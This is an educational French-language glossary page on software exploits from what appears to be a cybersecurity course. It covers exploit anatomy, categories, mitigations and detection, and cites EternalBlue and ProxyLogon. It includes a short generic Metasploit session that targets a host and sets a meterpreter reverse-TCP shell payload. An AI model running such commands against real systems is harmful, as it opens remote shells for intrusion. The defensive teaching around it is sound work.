Pourquoi C'est Important
Toute attaque significative convertit à un moment une vulnérabilité en impact, et cette conversion est le travail d'un exploit. Comprendre les exploits est essentiel pour les praticiens offensifs qui les écrivent, les défenseurs qui les détectent et les ingénieurs qui construisent du logiciel résistant.
WannaCry (2017) a utilisé l'exploit EternalBlue (CVE-2017-0144) pour se propager à des millions de systèmes. ProxyLogon (2021) a compromis des dizaines de milliers d'organisations. La vague d'exploitation Ivanti Connect Secure 2024 a montré la rapidité avec laquelle le code d'exploit est weaponisé après divulgation.
Anatomie d'un Exploit
Déclencheur Initial
Le chemin de code vulnérable est atteint, souvent par une entrée fabriquée violant des invariants supposés.
Construction de Primitives
Les exploits de corruption mémoire chaînent des primitives comme lecture/écriture arbitraire et fuites d'information.
Exécution de Code
Une fois le contrôle détourné, l'exploit exécute du code de l'attaquant : shellcode, loaders réflectifs, chaînes ROP.
Post-Exploitation
Persistance, élévation de privilèges, mouvement latéral, livraison de payload, souvent via du malware déployé séparément.
Catégories
| Catégorie | Cible | Exemples |
|---|---|---|
| Corruption mémoire | Programmes C/C++ | Buffer overflow, UAF, type confusion |
| Application web | Services HTTP | SQLi, XSS, SSRF, désérialisation |
| Logique | Sémantique applicative | Bypass auth, IDOR, race conditions |
| Cryptographique | Implémentations crypto | Padding oracle, RNG faible |
| Matériel | CPU/firmware | Spectre, Meltdown, Rowhammer |
| Ingénierie sociale | Humains | Phishing |
Frameworks
# Exemple Metasploit
msfconsole
> search type:exploit cve:2024
> use exploit/multi/http/exemple_rce
> set RHOSTS 10.0.0.5
> set LHOST 10.0.0.10
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> run- Metasploit Framework
- Cobalt Strike
- Sliver (C2 open-source)
- pwntools
- GDB / pwndbg / WinDbg
Mitigations
- Gestion des correctifs axée sur CISA KEV.
- Langages memory-safe (Rust, Go).
- Mitigations OS et compilateur.
- EDR avec prévention d'exploits.
- Sandboxing applicatif.
- Segmentation réseau.
- Moindre privilège.
Détection
- Processus enfants inattendus depuis navigateurs ou Office
- Injection DLL ou activité suspecte en mémoire
- Binaires non signés depuis chemins inscriptibles
- Beaconing anormal post-exploit
Concepts Liés
Comment nous enseignons Exploit
Dans notre programme de cybersécurité, vous n'apprendrez pas seulement Exploit en théorie, vous pratiquerez avec de vrais outils dans des travaux pratiques, guidé par des professionnels du secteur qui utilisent ces concepts quotidiennement.
Couvert dans :
Module 10: Tests d'Intrusion et Hacking Éthique
360+ heures de formation experte • CompTIA Security+ inclus